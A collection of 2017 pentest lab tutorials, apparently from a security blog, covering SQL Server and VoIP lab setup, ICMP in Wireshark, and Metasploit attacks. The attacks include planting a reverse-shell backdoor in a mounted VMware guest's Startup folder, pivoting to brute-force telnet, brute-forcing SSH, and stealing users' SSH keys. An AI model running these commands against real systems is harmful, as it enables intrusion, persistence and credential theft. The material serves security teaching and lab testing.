Specify the name and instance ID for the instance of SQL Server. The directory structure, registry structure and service names all incorporate the instance name and a specific instance ID. The instance ID becomes part of the installation path.

  • Enter SQLExpress in the text field for Named Instance
  • Enter SQLExpress in the text field for Instance ID

Then click on Next.

You can also select Default Instance if no instance of SQL Server was installed previously. A default instance does not require a user to give the instance name to create a connection.

Database Engine Configuration

Specify the Database Engine authentication security mode.

By default sa is the administrator of MS SQL.

Under the Authentication Mode panel:

  • Click on Mixed Mode, which is a combination of both authentication types, SQL Server and Windows.
  • Type your password and confirm it for the administrator (sa) account.

From the image you can observe that the selected user will be made a SQL Server administrator, with unrestricted access to the Database Engine.

Then click on Next and Next again.

Your SQL Server 2012 installation completed successfully; here you can check the status of the installed features.

Now open SQL Server Configuration Manager, which shows a left and a right panel.

Click on "Protocols for SQLEXPRESS" in the left panel and then select the protocol name "TCP/IP" in the right panel.

Under the IP Addresses tab specify TCP port 1433, click on Apply and enable TCP/IP.

Configure SQL Management Studio setup

Now open the second downloaded application, the SQL Server Management Studio setup, and add a new feature with it.

There are no updates for SQL Server 2012; click on Next.

Installation type

Since we have already created the instance "SQLExpress" we can now add features to the SQLExpress instance of SQL Server 2012.

In the image below you can observe the table of installed instances. Click on Next.

Feature selection

To install the instance feature, enable the check box "Management Tools - Basic" under shared features, then click on Next and Next again.

The Management Tools - Basic installation completed successfully; here you can check the status of the installed features.

Now log in to SQL Server with the admin credentials and click on Connect.

Once you are logged in to SQL Server, expand the Security folder and create a new login account for other users.

Enter the user name, here I gave "ignite", and set a password by choosing SQL Server authentication for this user.

From the image you can observe that master is the default database.

Connect to server

Run the HeidiSQL tool to connect to the MS SQL Server as the ignite user, as given below:

Network type: TCP/IP

Hostname /IP: 192.168.1.104

User: ignite

Password: 123456

Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQL server, Microsoft SQL databases and PostgreSQL. It lets you browse and edit data, and create and edit tables, views, procedures, triggers and scheduled events.

Now click on Open.

Great!! We have successfully accessed the MSSQL database server. You can modify or create tables or databases and much more.

Author: Sanjeet Kumar is an Information Security Analyst, Pentester and Researcher.


Post Exploitation in VMware Files with Meterpreter

Tue, 10/Oct/2017 - 22:56

Hello friends!! Today you will learn how to exploit an operating system that runs inside a virtual machine image found on an already compromised host.

Requirement

Attacker: Kali Linux

Target: VM image of Windows Server 2012

First the attacker needs to exploit the actual (host) operating system of the victim PC and obtain a Meterpreter session with admin privileges.

From the image you can see I have seized a Windows 10 Meterpreter session and also gained admin privileges.

meterpreter > sysinfo

When you install an operating system in VMware Workstation, all its hardware and network settings are stored in a .vmx file on the host operating system, next to the virtual disk files of that guest.

Type the following to search for .vmx files stored on the host:

meterpreter > search -f *.vmx -r

From the image you can see that it lists all locations where .vmx files are stored.

Using the cat command you can read the content of such a file, since it is a simple text document containing the VM's settings.

We opened the Windows Server 2012 VM's .vmx through cat:

meterpreter > cat "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"

In the image below you can read the details of this file, which describe the network and hardware settings; the fileName entries under keys such as scsi0:0 name the .vmdk disk files that the next step mounts.
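Reading the .vmx programmatically, as an added example that is not from the article or from Metasploit: the Python below parses the key = "value" lines of a .vmx, returns the present, non-CD-ROM disk images (the scsi0:0.fileName style keys) resolved against the .vmx directory, which is the path the mount step needs, and collects the guest's network adapter settings. The .vmx content is constructed here, modelled on the Windows Server 2012 guest path the article shows.

```python
"""Parse a VMware .vmx guest configuration to locate its virtual disks and network adapters.
Added example, not from the article or Metasploit; SAMPLE_VMX is constructed here."""
import re

SAMPLE_VMX = r'''
.encoding = "windows-1252"
config.version = "8"
virtualHW.version = "12"
displayName = "windows Server 2012"
guestOS = "windows8srv-64"
scsi0.present = "TRUE"
scsi0.virtualDev = "lsisas1068"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "windows Server 2012.vmdk"
scsi0:1.present = "TRUE"
scsi0:1.fileName = "data-disk.vmdk"
sata0:1.present = "TRUE"
sata0:1.deviceType = "cdrom-image"
sata0:1.fileName = "D:\iso\en_windows_server_2012_x64.iso"
ide1:0.present = "FALSE"
ide1:0.fileName = "old-disk.vmdk"
ethernet0.present = "TRUE"
ethernet0.connectionType = "bridged"
ethernet0.virtualDev = "e1000e"
ethernet0.generatedAddress = "00:0c:29:aa:bb:cc"
'''

_LINE = re.compile(r'^\s*([\w.:]+)\s*=\s*"(.*)"\s*$')
_DISK_KEY = re.compile(r"^((?:scsi|sata|ide|nvme)\d+:\d+)\.fileName$")
_NIC_KEY = re.compile(r"^(ethernet\d+)\.(\w+)$")


def parse_vmx(text: str) -> dict:
    """key = "value" lines into a dict; anything else (comments, blanks) is skipped."""
    cfg = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def disk_files(cfg: dict):
    """(device, fileName) for disks that are present and not CD-ROM images, in controller order."""
    disks = []
    for key, value in cfg.items():
        m = _DISK_KEY.match(key)
        if not m:
            continue
        dev = m.group(1)
        if cfg.get(f"{dev}.present", "FALSE").upper() != "TRUE":
            continue
        if "cdrom" in cfg.get(f"{dev}.deviceType", "").lower():
            continue
        disks.append((dev, value))
    return sorted(disks)


def vmdk_paths(vmx_path: str, cfg: dict):
    """Resolve relative disk names against the .vmx directory (the value a mount step wants)."""
    base = vmx_path.replace("\\", "/").rsplit("/", 1)[0]
    out = []
    for _, name in disk_files(cfg):
        name = name.replace("\\", "/")
        absolute = ":" in name[:2] or name.startswith("/")
        out.append(name if absolute else f"{base}/{name}")
    return out


def network_adapters(cfg: dict) -> dict:
    """ethernetN.* settings for adapters marked present."""
    adapters = {}
    for key, value in cfg.items():
        m = _NIC_KEY.match(key)
        if m and cfg.get(f"{m.group(1)}.present", "FALSE").upper() == "TRUE":
            adapters.setdefault(m.group(1), {})[m.group(2)] = value
    return adapters


if __name__ == "__main__":
    cfg = parse_vmx(SAMPLE_VMX)
    vmx = "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"  # path from the article
    print(vmdk_paths(vmx, cfg))
    print(network_adapters(cfg))
```

The present flag and deviceType checks matter: a .vmx keeps entries for removed disks and for ISO images, and mounting those either fails or gives you the installer media rather than the guest's system drive.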

This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.

use post/windows/manage/vmdk_mount

msf post(vmdk_mount) > set DEL_LCK true

msf post(vmdk_mount) > set READ_MODE false

msf post(vmdk_mount) > set SESSION 2

msf post(vmdk_mount) > set VDK_PATH "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmdk"

msf post(vmdk_mount) > run

VDK_PATH must point to the .vmdk disk file, not the .vmx: the .vmx only tells you where the disk lives (here the disk is assumed to carry the same base name as the .vmx, which is how VMware Workstation names it by default). READ_MODE false mounts the disk writable, which is needed to drop a file into it, and DEL_LCK true removes a stale lock file; as the module warns, only do this when no snapshot or clone depends on the disk.

Great!! We have successfully mounted the vmdk file of Windows Server 2012.

meterpreter > show_mount

Now in the image below you can read the information of each drive.

Now using the command below I upload an exe backdoor into the Startup folder on the L: drive, which will give us a reverse connection from Windows Server 2012 whenever it is booted in VMware Workstation.

meterpreter > upload /root/Desktop/abc.exe "L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"

use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.113

msf exploit(handler) > set LPORT 445

msf exploit(handler) > run

Awesome!! Once the virtual machine boots and runs the startup item, we have exploited the Windows Server 2012 virtual machine and gained its Meterpreter session.

meterpreter >sysinfo

Source: http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html

Author: Sanjeet Kumar is an Information Security Analyst, Pentester and Researcher.


Lab Setup for VOIP Penetration Testing

Mon, 09/Oct/2017 - 20:39

Hello friends! Today you will learn how to set up VoIP in a virtual machine using the trixbox 2.8.0.4 ISO image for making phone calls and sending text messages on a local network.

From Wikipedia

Voice over Internet Protocol (also voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

Let’s start!!

Open VMware, select "Create a New Virtual Machine", and in the "install from" wizard select the third option:

I will install the operating system later

Then click on Next.

Now select the second option, "Linux", as the guest operating system and select the version "Ubuntu". Then click on Next and Next as per your requirements.

Open the custom hardware settings to make the following changes:

Click on CD/DVD and browse to the ISO file "trixbox 2.8.0.4".

Select bridged networking and enable the check box "Replicate physical network connection state" in the network adapter settings.

Then click on Finish.

Trixbox is the world’s most popular Asterisk-based distribution. Trixbox enables even the novice user to quickly set up a voice over IP phone system and other necessary applications such as mysql and more. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million minute a month call center.

It will start booting the VM automatically; now for the trixbox CE installation follow the steps below:

A dialog box will appear to select the keyboard type; here choose the option "us" as given in the image below. Then click on OK.

Another dialog box will ask you to choose the time zone; select Asia/Kolkata. Then click on OK.

Now enter the password you want to give the root user. I gave trixbox as the password. Type it again to confirm and then click on OK.

Now it will start the installation process automatically, which will take some time as shown in the image below. Do not disturb the installation until it reaches 100 %.

Once the installation is complete it will ask for a login. Type username: root and password: trixbox

Check the network interface with the "ifconfig" command; from here I learned my VM's IP: 192.168.1.218.

Now open this IP, 192.168.1.218, in a web browser. Through the trixbox GUI we are going to create some user accounts by assigning them extension numbers, just as you receive an 8 digit number for your land line from the service provider.

By default the trixbox GUI opens in user mode, and to create extension numbers we need to switch to admin mode.

Click on the "switch" option shown in the top right corner of user mode.

Authentication is required to log in to trixbox's admin mode.

Now enter username: maint and password: password as the admin credentials.

You will get a pop-up message about trixbox registration; close this message.

On the trixbox dashboard you will see the server status; now click on the PBX option and select PBX Settings from the menu.

Under the admin's Setup list select the Extensions option under Basic.

Select device

Now follow given below steps for creating an extension inside the server:

Device: generic SIP device

Click on submit

Add extension

User extension: 1234567 (any 7/8 digit number)

Display name: ignite (name of user/ customer you want assign this number)

Device options

Secret: 123

Dtmfmode: rfc2833

Once you have entered the information for the new extension, click on Submit.

Similarly create one more extension so that we can check communication between the two extensions.

From the image you can see that we have now configured two extensions, the first for ignite [1234567] and the second for raj [12345678].

We created two extensions, one as caller and the other as receiver. You can create as many extensions as you require.

Now click on the orange bar "Apply Configuration Changes" to put them into effect.

A pop-up will open; here select "Continue with reload".

That is all for the server installation and the configuration of extensions in it.

Now download ZOIPER application in your system

Zoiper is a VoIP softphone that lets you send messages, make voice and video calls with your friends, family, colleagues and business partners.

Once it is downloaded it looks like the image below; now go to the settings option to configure an account which will be able to make calls to or receive calls from another user.

Select account type SIP and click on Next.

If you remember, in the trixbox GUI we added the extension 1234567 for ignite; now enter that information in the account wizard in order to save it as a new account.

Now enter the user number with the server IP as given below

1234567@192.168.1.218

Enter the password for this account.

Click on Next.

It auto-detects the account name as shown in the image. Then click on Next.

Your account has been created in the account list. Now ignite will be able to make calls to or receive calls from other users.

We have already created the ignite account on the PC through Zoiper for making and receiving calls. Now we need to install Zoiper on another device for the other user, who will be able to make or receive calls from ignite.

Download zoiper from Google play stores in your android phone.  Run the application after installation.

Click on the configuration icon to set up a new account on your phone, as shown in the image, and select Accounts from the list of configuration settings.

A new window will open; click on Add account. A dialog box will appear for account setup; click on YES.

Another dialog box will pop up; select manual configuration for the account setup.

Choose SIP as the account type.

Now enter the following information for the SIP account:

Account name: raj

Host: 192.168.1.218

Username: 12345678

Password: 123

Now click on Save.

You can see from the image that the account for raj is ready.

We now have two Zoiper accounts: raj will act as the caller, making a call to ignite from his phone, and ignite will be the receiver, getting the incoming call on the system.

As you know, we configured two extensions, one for ignite and another for raj. Let's test the VoIP setup by making a call from raj.

Raj calls ignite by dialing his number, 1234567; when you do this you will hear the outgoing ring tone on the phone.

Ignite gets the incoming call on the system as shown in the image. Click on Answer to accept the call from raj.

From the screenshot you can see that the call is connected and raj and ignite are talking over the VoIP call.

Great!!! In this way you can configure a VoIP server for a local network and let multiple users communicate by calls or chat.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post Lab Setup for VOIP Penetration Testing appeared first on Hacking Articles.

Categories: Cyber India

Understanding Guide to ICMP Protocol with Wireshark

Sat, 07/Oct/2017 - 23:24

From Wikipedia

The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information which indicates that a requested service is not available or that a host or router could not be reached.

It is a layer 3 (network layer) protocol, used by the ping command: the ICMP message is carried as the payload of an IP packet. With the usual Ethernet MTU of 1500 bytes, an unfragmented IP packet carrying ICMP cannot be larger than 1500 bytes.

ICMP packet at the network layer (MTU 1500):

IP header   ICMP header   ICMP payload (maximum)   Total
20 bytes    8 bytes       1472 bytes               20 + 8 + 1472 = 1500

ICMP packet at the data link layer (frame of 1514 bytes, the MTU plus the Ethernet header):

Ethernet header   IP header   ICMP header   ICMP payload (maximum)   Total
14 bytes          20 bytes    8 bytes       1472 bytes               14 + 20 + 8 + 1472 = 1514

ICMP Message code & Packet description with Wireshark

ICMP messages fall into two classes, query messages and error messages. Each message carries a type field and a code field; the lists below give the common types.

Query: query messages carry information requested from a router or another destination host.

For example, the following message types are ICMP query types:

  • Type 0 = Echo Reply
  • Type 8 = Echo Request
  • Type 9 = Router Advertisement
  • Type 10 = Router Solicitation
  • Type 13 = Timestamp Request
  • Type 14 = Timestamp Reply

A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means target host is alive.

Here we test how the ping command identifies a live host by pinging its IP address.

ping 192.168.0.105

From the image below you can see the replies from the host; notice a few more things:

  • The default payload size sent by the source machine is 32 bytes (request).
  • The same 32-byte payload is returned by the destination machine (reply).
  • TTL = 128, the default initial TTL of Windows, which suggests the host is a Windows system (TTL is only a hint: every router on the path decrements it by one, and other operating systems use other defaults).
  • Total packets are 8: 4 requests and 4 replies.

Look at the sequence of packets between source and destination captured in Wireshark.

The total number of packets captured is 8: 4 requests and 4 replies between the source and destination machine.

The 1st packet sent by the source machine is an ICMP echo request; in the image below, the highlighted text shows ICMP query type 8 (echo request).

The frame length is 74 bytes, as explained in the table below:

Ethernet header   IP header   ICMP header   ICMP payload (default)   Total
14 bytes          20 bytes    8 bytes       32 bytes                 14 + 20 + 8 + 32 = 74

Similarly, the image below shows the details of the 2nd packet, the echo reply; the highlighted text shows ICMP query type 0 (echo reply).

Error: error messages report a problem that a router or a destination host has encountered.

For example, the following message types are ICMP error types:

  • Type 3 = Destination Unreachable
  • Type 4 = Source Quench
  • Type 5 = Redirect
  • Type 11 = Time Exceeded
  • Type 12 = Parameter Problem

When we ping an IP we sometimes get no echo reply from the host; instead we get a message such as destination unreachable or time exceeded. This is an ICMP error-reporting message. There are many reasons behind such a message: a host on the network may be down, a router may have no route to it, or a firewall may be blocking the ping request.

The 1st packet sent by the source machine is the ICMP echo request; in the image below the highlighted text shows ICMP query type 8 (echo request).

Similarly, the image below shows the details of the 2nd packet, a destination unreachable message; you can observe that it shows ICMP error type 3.

ping -a 192.168.0.105

-a: resolve the address to a host name. Ping performs a reverse name lookup on the host IP address before sending the echo requests; if it succeeds, ping shows the matching host name.

From the image below you can observe that, before the ICMP echo requests, the lookup was sent over NBNS (NetBIOS Name Service), which runs on UDP port 137.

After applying a UDP filter you can read the host name captured by Wireshark, "WIN-1GKSSJ7D2AE", which is part of a workgroup.

By default ping sends 4 echo requests and receives the same number of replies from the host. You can increase or decrease this number with the command below.

ping -n 2 192.168.0.105

-n: number of echo requests to send

As we set -n to 2, two requests were sent and we got two replies.

Similarly we can set the TTL (Time to Live) of the echo request packets. Note that on Windows -i does not set the interval between packets (by default one request is sent roughly every second); it sets the initial TTL of the IP header, which every router on the path decrements by one. With -i 5 the packet is discarded after 5 hops and a Time Exceeded message is returned to the sender.

ping -i 5 192.168.0.105

-i TTL: Time To Live

Let's verify the TTL of the packets sent from source to destination in Wireshark. In the image below you will notice that every echo request has TTL 5, while every echo reply has the default TTL value of the host, i.e. 128.

ICMP payload description through Wireshark

As discussed above, the default size of the ICMP payload is 32 bytes and the maximum that fits in one frame is 1472; if the payload is larger than 1472 bytes the packet is fragmented into smaller packets.

From the image below you can observe that the source has pinged the host with the default 32-byte payload.

Now let's check the information the payload carries from source to destination using Wireshark. From the image below you can read that the highlighted text is a sequence of letters used as the 32-byte payload.

The alphabet has 26 letters, but Windows ping fills the payload with only 23 of them, repeated:

abcd...uvw is 23 letters; 9 more bytes are needed to complete 32 bytes, so it starts over with abcdefghi.

You can change the size of the payload carried by the echo request with the following command.

ping -l 33 192.168.0.105

As seen above, the 32-byte payload carries the letters abcd...uvw followed by abcd...hi. Hence if the payload size is 33 the data should be abcd...uvw followed by abcd...hij, and "j" must be the last byte of the payload.

From the image you can confirm that "j" is the last byte of the payload; increasing the payload size by one adds one more letter to the data.

The frame length has become 75 bytes, as shown in the table below:

Ethernet header   IP header   ICMP header   ICMP payload   Total
14 bytes          20 bytes    8 bytes       33 bytes       14 + 20 + 8 + 33 = 75

Now we send the maximum payload size with the following command.

ping -l 1472 192.168.0.105

From the image below you can see the reply from the host machine.

As explained above, a payload of 1472 bytes gives a frame size of 1514 bytes; let's verify it in Wireshark. From the image below you can read that the frame length is 1514 and the highlighted text shows the 1472-byte payload.

When the IP packet is larger than the MTU of the link (an ICMP payload of more than 1472 bytes on Ethernet), the sending host, or any router on the path with a smaller MTU, breaks it into smaller packets (fragments).

ping -l 1473 192.168.0.105

From the image below you can see that the payload size is now 1473 bytes.

From the image you can confirm that when the payload exceeds 1472 bytes the ICMP packet is fragmented as in the table below:

Fragment   Ethernet header   IP header   ICMP header   ICMP payload   Frame length
1st        14 bytes          20 bytes    8 bytes       1472 bytes     14 + 20 + 8 + 1472 = 1514
2nd        14 bytes          20 bytes    (none)        1 byte         14 + 20 + 1 = 35

Looking only at the IP layer, the first fragment carries 1480 bytes of IP payload (the 8-byte ICMP header plus 1472 bytes of data), the largest multiple of 8 that fits in a 1500-byte MTU, and the second fragment carries the remaining 1 byte. Only the first fragment contains the ICMP header; Wireshark reassembles the fragments to show the complete echo request.

Using the -f option with ping sets the Don't Fragment flag, which forbids fragmentation anywhere on the path.

ping -f -l 1472 192.168.0.105

-f: set the Don't Fragment flag in the packet

From the image below you can observe that the source host has set the Don't Fragment flag, which tells routers not to fragment the packet. A 1472-byte payload does not need fragmentation, so the ping succeeds.

If the payload size is set to 1473 together with the Don't Fragment flag, the packet cannot be delivered: on Windows, ping itself reports "Packet needs to be fragmented but DF set" because the packet exceeds the local interface MTU, and a router with a smaller MTU on the path would likewise discard it and return an ICMP Destination Unreachable message (type 3, code 4, fragmentation needed). This is the mechanism Path MTU Discovery relies on.

IP header   ICMP header   ICMP payload            Total (MTU 1500)
20 bytes    8 bytes       1473 bytes (DF set)     1501 bytes: exceeds the MTU, not possible
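The frame arithmetic, payload pattern and fragmentation rules described above, as an added example (not code from the article): it builds a Windows-style echo request with a valid checksum, parses it back, and computes the frame lengths and fragment sizes for any payload on a 1500-byte MTU link, including the Don't Fragment failure case. Python is assumed and no packets are sent; the header sizes are the ones in the tables above.

```python
import struct

ETH_HDR, IP_HDR, ICMP_HDR = 14, 20, 8       # byte sizes used in the tables above
MTU = 1500                                  # Ethernet MTU (IP header + IP payload)
MAX_UNFRAGMENTED_PAYLOAD = MTU - IP_HDR - ICMP_HDR   # 1472

ICMP_TYPES = {0: "Echo Reply", 3: "Destination Unreachable", 8: "Echo Request",
              11: "Time Exceeded", 12: "Parameter Problem"}


def windows_ping_payload(size: int) -> bytes:
    """Windows ping fills the payload with the 23 letters a..w, repeated:
    32 bytes gives b'abcdefghijklmnopqrstuvw' + b'abcdefghi'."""
    pattern = b"abcdefghijklmnopqrstuvw"
    return (pattern * (size // len(pattern) + 1))[:size]


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over header + payload (zero-padded to even)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """Type 8, code 0, checksum, identifier, sequence number, then the data."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def parse_icmp(msg: bytes) -> dict:
    """Decode the ICMP header; an intact message checksums to zero."""
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", msg[:ICMP_HDR])
    return {"type": icmp_type, "name": ICMP_TYPES.get(icmp_type, "other"),
            "code": code, "id": ident, "seq": seq, "payload": msg[ICMP_HDR:],
            "checksum_ok": icmp_checksum(msg) == 0}


def frame_length(payload_size: int) -> int:
    """Ethernet frame length Wireshark reports for an unfragmented echo request."""
    return ETH_HDR + IP_HDR + ICMP_HDR + payload_size


def fragment_frames(payload_size: int, dont_fragment: bool = False) -> list:
    """Frame lengths produced on a 1500-byte MTU link for a given ICMP payload.
    The IP payload (ICMP header + data) is split into chunks that are multiples
    of 8 bytes; only the first fragment carries the ICMP header."""
    ip_payload = ICMP_HDR + payload_size
    if ip_payload <= MTU - IP_HDR:
        return [ETH_HDR + IP_HDR + ip_payload]
    if dont_fragment:
        raise ValueError("Packet needs to be fragmented but DF set")
    chunk = (MTU - IP_HDR) // 8 * 8          # 1480 bytes of IP payload per fragment
    frames = []
    while ip_payload > 0:
        piece = min(chunk, ip_payload)
        frames.append(ETH_HDR + IP_HDR + piece)
        ip_payload -= piece
    return frames


if __name__ == "__main__":
    pkt = build_echo_request(ident=1, seq=1, payload=windows_ping_payload(32))
    print(parse_icmp(pkt)["name"], "in a frame of", frame_length(32), "bytes")
    print("1473-byte payload fragments into frames of", fragment_frames(1473))
```

fragment_frames(1473) returns [1514, 35], the two frames in the table above; passing dont_fragment=True for the same size raises the error the Windows ping prints.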

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

The post Understanding Guide to ICMP Protocol with Wireshark appeared first on Hacking Articles.

Categories: Cyber India

Telnet Pivoting through Meterpreter

Fri, 06/Oct/2017 - 21:54

In our previous tutorial we had discussed on SSH pivoting and today we are going to discuss Telnet pivoting.

From Offensive Security

Pivoting is a technique to get inside an unreachable network with the help of a pivot (centre point). In simple words it is an attack through which an attacker can exploit systems which belong to a different network. For this attack, the attacker needs to exploit the main server, which helps the attacker to add himself inside its local network, and then the attacker will be able to target the client systems for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine (client): Windows operating system with two network interfaces

Target Machine: Ubuntu server (with the telnet service enabled)

Exploit pivot machine

Use the MS17-010 exploit, or a payload with multi/handler, to compromise the pivot machine.

sessions

From the given image you can confirm that I own the pivot machine (192.168.1.107) as meterpreter session 1.

Check the network interfaces with the following command:

meterpreter> ifconfig

From the given image you can observe two network interfaces on the pivot system: the 1st with IP 192.168.1.107, through which the attacker is connected, and the 2nd with IP 10.0.0.20, through which the telnet server (target) is reachable.

Route Add

Since the attacker is on the 192.168.1.0/24 network and the target on 10.0.0.0/24, it is not possible to attack the target network directly unless the attacker gets a route into it. To reach the 10.0.0.0 network through the compromised host, run the post-exploitation module "autoroute", which adds a route through the meterpreter session.

use post/multi/manage/autoroute

msf post(autoroute) > set session 1

msf post(autoroute) > exploit

This module will perform an ARP scan for a given IP range through a Meterpreter session.

use post/windows/gather/arp_scanner

msf post(arp_scanner) > set rhosts 10.0.0.1-30

msf post(arp_scanner) > set session 1

msf post(arp_scanner) > set threads 20

msf post(arp_scanner) > exploit

Here we found a new IP, 10.0.0.10, as shown in the given image. Let's perform a TCP port scan for active services on this machine.

This module enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 23

msf auxiliary(tcp) > set rhosts 10.0.0.10

msf auxiliary(tcp) > set threads 10

msf auxiliary(tcp) > exploit

From the given image you can observe that port 23 is open, and we know that port 23 is used by the telnet service.

Use Telnet login Brute Force Attack

An attacker will often try a brute force attack to steal credentials for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type the following commands to brute force the telnet login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 10.0.0.10

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > exploit

From the given image you can observe that the telnet server is not protected against brute force: the module found the matching combination username aarti and password 123 and, at the same time, opened a command shell on the victim as session 2.

Let's count the sessions we now hold with the following command:

sessions

From the given image you can observe two sessions: the 1st is the meterpreter session on the Windows system and the 2nd is the command shell on the telnet server.

sessions 2

Now the attacker is in the command shell of the server; let's verify it through the network configuration.

ifconfig

From the given image you can observe that the network IP is 10.0.0.10.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

The post Telnet Pivoting through Meterpreter appeared first on Hacking Articles.

Categories: Cyber India

SSH Penetration Testing (Port 22)

Wed, 04/Oct/2017 - 15:20

Probing every open port is practically the first step attackers take to prepare their attack. A service has to keep its port open to do its job, but an open port is also what the attacker looks for. Therefore, one must learn to secure a service even though its port is open.

Requirement

Attacker: Kali Linux

Target: Ubuntu system (install ssh and putty-tools)

Client: Windows system (install PuTTY and PuTTYgen)

In this article we will secure the SSH port so that, even though it is open, no one will be able to exploit it. First of all let's install the SSH server with the following commands:

sudo apt-get install openssh-server

sudo apt-get install putty-tools

Once the server is installed, start the SSH service by typing:

service ssh start

To confirm that SSH is running, use the following command:

service ssh status

Connect with PuTTY: in the PuTTY configuration, give the IP address in Host Name along with the port number, select SSH and click on Open.

Upon opening, it will ask for the password; give the password and press Enter.

SSH Banner Grabbing

Now that the SSH service is running, scan it from Kali using nmap:

nmap -sV 192.168.1.17

The scan will show that port 22 is open with the SSH service.

Type msfconsole to load the Metasploit framework and use the auxiliary module below to fetch the SSH banner.

use auxiliary/scanner/ssh/ssh_version

msf auxiliary(ssh_version) > set rhosts 192.168.1.17

msf auxiliary(ssh_version) > set rport 22

msf auxiliary(ssh_version) > exploit

From the image below you can confirm that it has grabbed the SSH banner.

An attacker always performs enumeration to find important information such as software versions (known as banner grabbing) and then checks whether that version is vulnerable to any known exploit.

Prevention against Banner Grabbing

As discussed above, banner grabbing can expose the exact software or service version running on a remote system; therefore, after installing any service, disclose as little version information as possible.

The admin should make the following change in the configuration file to reduce the banner information:

  • Open the sshd_config file (/etc/ssh/sshd_config)
  • Add a new line "DebianBanner no" as shown in the given image.

Save the file after the modification as shown in the given image, then restart the service with the following command so that the new setting takes effect:

service ssh restart

Let's verify the version of the running service after changing the banner with an nmap version scan.

nmap -p 22 -sV 192.168.1.17

Wonderful!! The distribution package suffix is no longer disclosed, as you can confirm from the given image. Note that the SSH protocol requires the server to send its version string, so nmap still reports OpenSSH and its upstream version number; DebianBanner only removes the distribution-specific part, which is what reveals the exact patch level.

Exploit SSH through Brute Force Attack

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.1.17

msf auxiliary(ssh_login) > set rport 22

msf auxiliary(ssh_login) > set userpass_file /root/Desktop/ssh.txt

msf auxiliary(ssh_login) > exploit

Great!! We have not only found the valid SSH credentials raj:123 but also obtained a command shell on the victim as session 1, i.e. unauthorized access to the target system.

From the image below you can see that we checked the victim's network interfaces by executing ifconfig through session 1.

Now I executed the following command, which upgrades the command shell session to a meterpreter session.

sessions -u 1

sessions

Hence you can see that I now hold two sessions: the 1st is the command shell and the 2nd is the meterpreter session.

SSH Connection using Key Pairs

This was our first measure of security. For the second measure, download and install PuTTYgen (the PuTTY Key Generator). Open it and click on the Generate button at the lower right.

This will generate a public and a private key. Save the private key.

The private key will be saved as shown in the following image. You can rename it as you like; I have named it "ssh login key".

Now open a terminal on the server and type:

ssh-keygen

This command creates the .ssh folder in the user's home directory (and a key pair for that user, which we do not need here). In the same folder, create an empty text file named authorized_keys.

Copy the "ssh login key.ppk" file created previously into the .ssh folder. Note that the server only needs the public key; the .ppk also contains the private key, so delete it from the server once the next step is done and keep it only on the client.

In the terminal, move into the .ssh folder and type the following command:

puttygen -L "ssh login key.ppk"

This command prints the public key of the .ppk file in OpenSSH authorized_keys format. Copy this line into the empty authorized_keys file created earlier.

Then in the PuTTY configuration, go to Connection > Data and give the auto-login username.

Then open Connection > SSH > Auth and give the path of the SSH login key (the private key that was generated).

Then in the Session tab give the IP address and port number, and click on Open.

It will open without asking for a password because you have configured the key.

But this doesn't mean it can't be opened with a password: password authentication is still enabled, so we are still exposed to brute force.

Exploit SSH by Stealing SSH Keys

If you have already exploited the target and have its meterpreter session as shown above, you can use the following post-exploitation module to steal SSH keys.

This module will collect the contents of all users' .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.

use post/multi/gather/ssh_creds

msf post(ssh_creds) > set session 1

msf post(ssh_creds) > exploit

